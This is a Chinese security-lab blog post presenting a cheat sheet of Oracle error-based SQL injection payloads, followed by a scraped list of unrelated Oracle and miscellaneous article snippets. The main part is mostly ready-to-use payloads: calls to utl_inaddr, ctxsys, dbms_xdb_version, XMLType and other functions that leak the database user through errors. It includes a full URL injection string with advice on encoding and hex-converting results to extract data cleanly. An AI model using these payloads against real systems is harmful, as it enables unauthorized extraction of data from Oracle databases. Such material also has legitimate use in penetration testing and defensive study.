回歸樸素、oracle注入

2021-12-25 字節脈搏實驗室

utl_inaddr.get_host_name

select utl_inaddr.get_host_name((select user from dual)) from dual;

11g之後,使用此函數的資料庫用戶需要有訪問網絡的權限

ctxsys.drithsx.sn

select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

處理文本的函數,參數錯誤時會報錯。


CTXSYS.CTX_REPORT.TOKEN_TYPE

select CTXSYS.CTX_REPORT.TOKEN_TYPE((select user from dual), '123') from dual;

 

XMLType

http://localhost:8080/oracleInject/index?username=admin' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

注意url編碼,如果返回的數據有空格的話,它會自動截斷,導致數據不完整,這種情況下先轉為 hex,再導出。


dbms_xdb_version.checkin

select dbms_xdb_version.checkin((select user from dual)) from dual;

 

dbms_xdb_version.makeversioned

select dbms_xdb_version.makeversioned((select user from dual)) from dual;

 

dbms_xdb_version.uncheckout

select dbms_xdb_version.uncheckout((select user from dual)) from dual;

 

dbms_utility.sqlid_to_sqlhash

SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

 

ordsys.ord_dicom.getmappingxpath

select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

 

UTL_INADDR.get_host_name

select UTL_INADDR.get_host_name((select user from dual)) from dual;

 

UTL_INADDR.get_host_address

select UTL_INADDR.get_host_name('~'||(select user from dual)||'~') from dual;

相關焦點

  • oracle注入總結
    基於錯誤的注入可以通過輸入一些字符,發現有報錯返回信息,可以嘗試注入。
  • 一篇文章入門Oracle注入
    版本 Oracle Database 11g# 拉取鏡像$ docker pull deepdiver/docker-oracle-xe-11g# 啟動容器$ docker run -d --name oracledb -p 1002:22 -p 1521:1521 deepdiver/docker-oracle-xe-
  • SQL注入速查表與Oracle注入速查表總結
    log bypass(S)注入測試一些其他的MySQL筆記MySQL中好用的函數SQL注入的高級使用強制SQL Server來得到NTLM哈希Bulk insert UNC共享文件 (S)0x01 盲注關於盲注一個經過完整而優秀開發的應用一般來說你是看不到錯誤提示的,所以你是沒辦法從Union攻擊和錯誤中提取出數據的
  • 繁華過後 回歸樸素 平淡為真
    人生走到最後,都要回歸樸素和簡單,過程所經歷的繁蕪,只是為平淡的結局寫下深沉的一筆。——題記生活在繁雜的塵世間,有太多的身不由己,經歷種種繁華,最終歸於平淡。萬千繁華過後,或許你會更喜歡樸素與簡單,沒有身心負累,只餘返璞歸真。
  • 零基礎學Oracle之1:Oracle體系架構
    2) database:有物理結構和邏輯結構物理結構包括三大文件:data file、control file、redo log file邏輯結構包括:database->tablespace->segment->extent->oracle data block
  • 零基礎學Oracle之9:Oracle redo log file實驗
    上一節描述了oracle redo log文件的理論,這一節來演示redo log 文件的操作。3 '/u01/app/oracle/oradata/orcl/redo04b.rd0')4 size 50m;Database altered.
  • 超簡單的Oracle 資料庫安裝教程
    安裝包下載地址https://www.oracle.com/cn/database/technologies/oracle-database-software-downloads.html#19c我們選用RPM包下載安裝。
  • 聊聊oracle+hint 的使用
    Oracle擁有非常好的優化算法,尤其是在8i版本之後引入CBO,很多的sql oracle都可以幫我們選擇非常好的執行計劃,但是有些時候
  • 【安裝篇】- 基於 VMWARE Oracle Linux7.9 安裝 Oracle19c RAC 詳細配置方案
    #private ip192.168.28.141 oracle19c-rac1-priv192.168.28.142 oracle19c-rac2-priv#vip192.168.245.143 oracle19c-rac1-vip192.168.245.144 oracle19c-rac2-vip#scanip192.168.245.145 oracle19c-rac-scan1'>>
  • Gorm 終於可以操作 Oracle 了
    二是為了推廣 gorm 的 oracle 驅動,避免因為操作 oracle 而編寫大量的樣板代碼。同時也要感謝Go 語言中文網的站長 polaris 能用它的公眾號為這個庫進行推廣。gorm-oracle 開源庫地址:https://github.com/cengsin/oracle歡迎大家積極參與維護 :)使用 gorm 連接 oracle 前置條件首先安裝 oracle 資料庫客戶端和 go-oci8
  • Oracle 21c新特性——DG相關
    可參考:https://docs.oracle.com/en/database/oracle/oracle-database/21/sbydb/managing-oracle-data-guard-physical-standby-databases.html#GUID-05508445-ED4C-4C5B-91EC-07B8C010BC4F。
  • 甲骨文免費開放Oracle自治資料庫和Oracle雲基礎設施線上課程及認證
    打開 https://education.oracle.com/zh_CN/  2. 點擊頁面右上角的「您好,登錄」,選擇「創建帳戶」並填寫必填欄位。  3. 通過電子郵件驗證帳戶,完成帳戶創建。  步驟二:通過以下連結訪問感興趣的課程  · Oracle自治資料庫專家課程  Oracle Autonomous Database Specialist  https://learn.oracle.com/ols/learning-path/become-an-autonomous-database-specialist
  • Oracle 資料庫遷移-百家號 - 百度經驗
    關閉資料庫SQL> shutdown immediate;  立即關閉[oracle@oracle10g orcl]$ lsnrctl stop注意:關閉之前需要停止所有應用移動所有數據文件、控制文件、臨時文件、日誌文件到新的位置留一份控制文件在原有路徑做冗餘啟動資料庫到nomount狀態,並更改控制文件位置,關閉資料庫SQL> startup
  • 如何將Oracle遷移至mysql?
    如果需要支持oracle連接,還需要配置OCI,選擇工具—選項—OCI,選擇對應路徑下文件:配置完成後關閉Navicat再重新打開。如果需要註冊,主目錄下key文件中有註冊碼。2)配置目的(mysql)資料庫連接輸入mysql連接信息3) 配置源(oracle)資料庫連接4)選擇工具-數據傳輸,配置源資料庫及目標資料庫,並選擇要傳輸的表在高級選項中可選擇只創建表,不同步記錄。也可以同時創建表和同步記錄。配置完成後點擊開始後進行轉換。
  • oracle數據脫敏工具-安華金和
    【oracle數據脫敏工具的要求】oracle數據脫敏工具應該具有對多種異構數據源的支持,從而將一個脫敏規則應用於不同的數據源,比如針對「客戶名稱」欄位的修改,脫敏規則基本一致,可以在Oracle數據源上直接引用。
  • Oracle 常用語法和函數,存儲過程
    1.oracle埠衝突問題2.oracle基本 語法3.oracle常用函數3.1 單行函數4.
  • 怎麼卸載oracle vm virtualbox軟體
    怎麼卸載oracle vm virtualbox軟體首先打開360軟體管家,找到oracle vm virtualbox這個軟體,點擊卸載,看能不能卸載掉,如果不能就要換一種方法。在電腦桌面用滑鼠雙擊控制面板。進入到控制面板頁面,點擊程序和功能。
  • 富邦勇士:野獸回歸意義深遠 為臺灣籃壇注入強心劑
    富邦勇士領隊蔡承儒表示:「他的回歸將為臺灣籃壇注入一劑強心針。」「林志傑是黃金世代最具代表性的籃球員之一,他的回歸將為臺灣籃壇注入一劑強心針,在此時刻意義深遠。」蔡承儒表示,「而教練團也一致認為林志傑打球聰明且全面,在場上具有相當的主宰力,又可將經驗傳承給年輕世代,有他加入勇士戰力將再進化提升。」
  • Oracle19c RAC異機恢復到單機
    __oracle_base='/u01/app/oracle'#ORACLE_BASE set from environmentDEMODB.__pga_aggregate_target=671088640DEMODB.__sga_target=1006632960DEMODB.__shared_io_pool_size=16777216DEMODB.
  • Oracle RAC 集群結構
    RAC集群結構圖:RAC拓撲結構一個oracle rac集群資料庫是由兩個或者兩個以上的伺服器節點組成,每臺伺服器都有自己的OS,cluseterware,rac和listener網絡監聽器Cluseterware是oracle 開發的一個集成軟體,主要作用是集群的系統管理;rac作用是提供oracle實例進程,供客戶端訪問集群系統;監聽服務主要用於監控自己為網絡埠信息,所有的程序都是通過作業系統去訪問最下層的共享存儲讀寫數據。